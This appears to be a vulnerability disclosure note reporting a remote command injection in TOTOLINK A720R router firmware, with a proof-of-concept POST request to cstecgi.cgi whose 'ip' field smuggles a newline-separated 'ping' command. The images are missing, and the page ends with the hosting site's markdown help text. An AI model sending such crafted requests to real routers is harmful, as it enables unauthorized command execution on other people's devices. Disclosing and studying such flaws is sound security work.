totolink vulnerability

vendor:TOTOLINK

product:A720R;

version:A720R_Firmware(V4.1.5cu.470_B20200911)

type:Remote Command Execution

author:Jinwen Zhou、Yifeng Li、Yongjie Zheng

institution:potatso@scnu、feng@scnu、eifiz@scnu

Vulnerability description

We found an Command Injection vulnerability and buffer overflow vulnerability in TOTOLINK Technology router with firmware which was released recently，allows remote attackers to execute arbitrary OS commands from a crafted request.

Remote Command Injection vulnerability

In this function,ip is directly passed by the attacker, so we can control the ip to attack the OS.

Image Not Showing Possible Reasons

The image file may be corrupted
The server hosting the image is unavailable
The image path is incorrect
The image format is not supported

Learn More →

Image Not Showing Possible Reasons

The image file may be corrupted
The server hosting the image is unavailable
The image path is incorrect
The image format is not supported

Learn More →

PoC

Remote Command Injection

We set the value of ip as -h\nping 1.1.1.1\n and the router will excute ping command,such as:

POST http://example.com/cgi-bin/cstecgi.cgi?action=s

{"topicurl":"setDiagnosisCfg","ip":"-h\nping 1.1.1.1\n","num":"500"}

Syntax	Example	Reference
# Header	Header	基本排版
- Unordered List	Unordered List
1. Ordered List	Ordered List
- [ ] Todo List	Todo List
> Blockquote	Blockquote
Bold font	Bold font
Italics font	Italics font
~~Strikethrough~~	~~Strikethrough~~
19^th^	19^th
H~2~O	H₂O
++Inserted text++	Inserted text
==Marked text==	Marked text
[link text](https:// "title")	Link
![image alt](https:// "title")	Image
`Code`	`Code`	在筆記中貼入程式碼
```javascript var i = 0; ```	`var i = 0;`	在筆記中貼入程式碼
:smile:		Emoji list
{%youtube youtube_id %}	Externals
$L^aT_eX$	L^aT_eX
:::info This is a alert area. :::	This is a alert area.